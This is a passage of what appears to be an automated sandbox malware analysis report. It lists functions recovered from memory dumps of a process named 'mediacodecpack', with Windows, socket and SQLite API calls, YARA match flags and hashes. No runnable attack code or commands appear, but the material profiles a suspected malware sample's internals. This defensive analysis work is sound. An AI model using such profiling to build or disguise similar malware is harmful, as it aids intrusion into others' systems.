                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                            • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                            • API String ID: 2140441600-46888669
                                                                                            • Opcode ID: e6d9e3735ff365889277b9bb8ddff4f1a020102819db173fc1043069e3ed78da
                                                                                            • Instruction ID: dac0248bd49164288231e32b61e7be5176ae2fa967f4feef4e7ebac1c2dab7cf
                                                                                            • Opcode Fuzzy Hash: e6d9e3735ff365889277b9bb8ddff4f1a020102819db173fc1043069e3ed78da
                                                                                            • Instruction Fuzzy Hash: D921D7719083909FD720DF24C558B5BBBE9BB89B08F404A5DF8A587790D7B9D808CF92
                                                                                            APIs
                                                                                            • __getptd_noexit.LIBCMT ref: 02D536F0
                                                                                              • Part of subcall function 02D548E2: GetLastError.KERNEL32(75570A60,7556F550,02D54AD0,02D52043,7556F550,?,02D45A0D,00000104,75570A60,7556F550,ntdll.dll,?,?,?,02D45EE8), ref: 02D548E4
                                                                                              • Part of subcall function 02D548E2: __calloc_crt.LIBCMT ref: 02D54905
                                                                                              • Part of subcall function 02D548E2: __initptd.LIBCMT ref: 02D54927
                                                                                              • Part of subcall function 02D548E2: GetCurrentThreadId.KERNEL32 ref: 02D5492E
                                                                                              • Part of subcall function 02D548E2: SetLastError.KERNEL32(00000000,02D45A0D,00000104,75570A60,7556F550,ntdll.dll,?,?,?,02D45EE8), ref: 02D54946
                                                                                            • __calloc_crt.LIBCMT ref: 02D53713
                                                                                            • __get_sys_err_msg.LIBCMT ref: 02D53731
                                                                                            • __invoke_watson.LIBCMT ref: 02D5374E
                                                                                            Strings
                                                                                            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02D536FB, 02D53721
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                            • API String ID: 109275364-798102604
                                                                                            • Opcode ID: 09cde912488132102ee5e96ae2ac18318d76545c8eb8986bdfa4a6c60097c0bf
                                                                                            • Instruction ID: 2777f83cd3386d4c6f86c7ba8bea0ddc57eee294ec9c34b06f1d68d4263f4227
                                                                                            • Opcode Fuzzy Hash: 09cde912488132102ee5e96ae2ac18318d76545c8eb8986bdfa4a6c60097c0bf
                                                                                            • Instruction Fuzzy Hash: 76F0E9B6D0473477AF62352A9C41A3B72CDDB447E0F0000A6FE8496300EBD5DC0086E5
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D42350
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D42360
                                                                                            • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D42370
                                                                                            • GetLastError.KERNEL32 ref: 02D4237A
                                                                                              • Part of subcall function 02D41712: __EH_prolog.LIBCMT ref: 02D41717
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                            • String ID: pqcs
                                                                                            • API String ID: 1619523792-2559862021
                                                                                            • Opcode ID: eff6d5a12aa5335dcca8184bf60885c26ce100fd0ac4aebc32aec27612d4ebf1
                                                                                            • Instruction ID: f8377ee688411ca6591ad0bca646bae9a78a8d629f78c2015fd2ac824c6b86db
                                                                                            • Opcode Fuzzy Hash: eff6d5a12aa5335dcca8184bf60885c26ce100fd0ac4aebc32aec27612d4ebf1
                                                                                            • Instruction Fuzzy Hash: 91F03A71A40304AFDB20AFA4A80DFAB7BBCEB01705F500969F985D6340EB70DD94CBA1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D44035
                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02D44042
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02D44049
                                                                                            • std::exception::exception.LIBCMT ref: 02D44063
                                                                                              • Part of subcall function 02D496CE: __EH_prolog.LIBCMT ref: 02D496D3
                                                                                              • Part of subcall function 02D496CE: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D496E2
                                                                                              • Part of subcall function 02D496CE: __CxxThrowException@8.LIBCMT ref: 02D49701
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                            • String ID: bad allocation
                                                                                            • API String ID: 3112922283-2104205924
                                                                                            • Opcode ID: cb43346c64efcf00fd68e6c6f4335056ae67aeb95423f7099f14234ef8218e0f
                                                                                            • Instruction ID: 593dabfcfeb5673f1ccffb78ae2c3d722d6a723261f7c43f0e148421ddc7b38f
                                                                                            • Opcode Fuzzy Hash: cb43346c64efcf00fd68e6c6f4335056ae67aeb95423f7099f14234ef8218e0f
                                                                                            • Instruction Fuzzy Hash: 24F05E71E00209ABDB00AFE0D90CBFF7778EB04305F104855E916A2341DB7989188FA1
                                                                                            APIs
                                                                                              • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                                            • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                                            • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                                              • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                              • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                              • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                              • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                                            • String ID:
                                                                                            • API String ID: 683514883-0
                                                                                            • Opcode ID: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                            • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                                            • Opcode Fuzzy Hash: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                            • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                                                            APIs
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                                            • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                                            • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                                            • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                                              • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                              • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                              • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                              • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                              • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                                            • String ID:
                                                                                            • API String ID: 1903298374-0
                                                                                            • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                            • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                                                            • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                            • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                                                            APIs
                                                                                              • Part of subcall function 02D50A60: CloseHandle.KERNEL32(00000000,96605425), ref: 02D50AB1
                                                                                              • Part of subcall function 02D50A60: WaitForSingleObject.KERNEL32(?,000000FF,96605425,?,?,?,?,96605425,02D50A33,96605425), ref: 02D50AC8
                                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D50D2E
                                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D50D4E
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02D50D87
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02D50DDB
                                                                                            • SetEvent.KERNEL32(?), ref: 02D50DE2
                                                                                              • Part of subcall function 02D4418C: CloseHandle.KERNEL32(00000000,?,02D50D15), ref: 02D441B0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                            • String ID:
                                                                                            • API String ID: 4166353394-0
                                                                                            • Opcode ID: e00cff88295c918af4ef5ea226ec298a7c66311a78282426cfe481148b5c580c
                                                                                            • Instruction ID: 7521407a1aabc03c5b2a9e5d77664f0894991604dd78d1a96ad4f93d6b374f4c
                                                                                            • Opcode Fuzzy Hash: e00cff88295c918af4ef5ea226ec298a7c66311a78282426cfe481148b5c580c
                                                                                            • Instruction Fuzzy Hash: DA41D2316003218FDF259F18CC80B1BB7A4EF49725F18066AEC19AB395D77AEC01CBA1
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D420AC
                                                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02D420CD
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D420D8
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02D4213E
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D421A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                                            • String ID:
                                                                                            • API String ID: 1611172436-0
                                                                                            • Opcode ID: dc401a7cdd6e3633caac98743c91fe107d4aaccb0a914411c4f721cff350e85a
                                                                                            • Instruction ID: 296ec6bae9fb9769d84b26ffc5b4aeb7364152c2b20a8f9d8852608b1557b893
                                                                                            • Opcode Fuzzy Hash: dc401a7cdd6e3633caac98743c91fe107d4aaccb0a914411c4f721cff350e85a
                                                                                            • Instruction Fuzzy Hash: 16311771504701AFC324DF25D889A6BBBE9FBD8754F104A1EF89682750DB30E946CBA2
                                                                                            APIs
                                                                                              • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                            • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                            • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                            • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                            • String ID:
                                                                                            • API String ID: 1894464702-0
                                                                                            • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                            • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                                                            • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                            • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4D101
                                                                                              • Part of subcall function 02D41A01: TlsGetValue.KERNEL32 ref: 02D41A0A
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D4D180
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02D4D19C
                                                                                            • InterlockedIncrement.KERNEL32(02D730F0), ref: 02D4D1C1
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02D4D1D6
                                                                                              • Part of subcall function 02D427F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02D4284E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                            • String ID:
                                                                                            • API String ID: 1578506061-0
                                                                                            • Opcode ID: 280cf5975b3f169052a634fd15cb257402868b571c033bc352546af235959997
                                                                                            • Instruction ID: 2e239f2cfd976ff4d2f2681e2e9bc75175a3e2c02b669865b34b7d5d13af7a59
                                                                                            • Opcode Fuzzy Hash: 280cf5975b3f169052a634fd15cb257402868b571c033bc352546af235959997
                                                                                            • Instruction Fuzzy Hash: C13136B1D012059FC710DFA8D548AAABBF9FF09310F14455ED889E7740EB35AA14CFA0
                                                                                            APIs
                                                                                              • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                                            • sqlite3_log.SQLITE3 ref: 609253E2
                                                                                            • sqlite3_log.SQLITE3 ref: 60925406
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                            • String ID:
                                                                                            • API String ID: 3336957480-0
                                                                                            • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                            • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                                                            • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                            • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                                            APIs
                                                                                            • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                                            • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                                            • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                                            • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                                            • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                                            • String ID:
                                                                                            • API String ID: 3091402450-0
                                                                                            • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                            • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                                                            • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                            • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02D42A3B
                                                                                            • closesocket.WS2_32 ref: 02D42A42
                                                                                            • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02D42A89
                                                                                            • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02D42A97
                                                                                            • closesocket.WS2_32 ref: 02D42A9E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                            • String ID:
                                                                                            • API String ID: 1561005644-0
                                                                                            • Opcode ID: f10883465d16fad5c89638b254970198b66151fd6dec82d8c570348c02f51195
                                                                                            • Instruction ID: 233ad93fa4034004491afb91a4af7ec9074c505c122d2cef1acb5de95f816cc2
                                                                                            • Opcode Fuzzy Hash: f10883465d16fad5c89638b254970198b66151fd6dec82d8c570348c02f51195
                                                                                            • Instruction Fuzzy Hash: 7E21C175E04205AFEB20ABB8985C76AB7E9DF44315F51496AED55C3390EF708D80CB60
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                            • String ID:
                                                                                            • API String ID: 251237202-0
                                                                                            • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                            • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                                                            • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                            • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                                                            APIs
                                                                                            • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                                            • String ID:
                                                                                            • API String ID: 4225432645-0
                                                                                            • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                            • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                                                            • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                            • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 02D5E8B0
                                                                                              • Part of subcall function 02D51FBC: __FF_MSGBANNER.LIBCMT ref: 02D51FD3
                                                                                              • Part of subcall function 02D51FBC: __NMSG_WRITE.LIBCMT ref: 02D51FDA
                                                                                              • Part of subcall function 02D51FBC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02D51FFF
                                                                                            • _free.LIBCMT ref: 02D5E8C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 1020059152-0
                                                                                            • Opcode ID: be0adbd6a73625f4abf1b151c192f53b9e0c29309d63eb1a0ab689c454bc92dc
                                                                                            • Instruction ID: b91a02664504be3afa1db802ca4192e20abc91161ac67f94fd3b8f6401e74be2
                                                                                            • Opcode Fuzzy Hash: be0adbd6a73625f4abf1b151c192f53b9e0c29309d63eb1a0ab689c454bc92dc
                                                                                            • Instruction Fuzzy Hash: 69119432844631AACFA53F70A80875A3B9ADF04365F504A35FD4996390DBB5CE90CEA5
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D421DA
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D421ED
                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02D42224
                                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02D42237
                                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D42261
                                                                                              • Part of subcall function 02D42341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D42350
                                                                                              • Part of subcall function 02D42341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D42360
                                                                                              • Part of subcall function 02D42341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D42370
                                                                                              • Part of subcall function 02D42341: GetLastError.KERNEL32 ref: 02D4237A
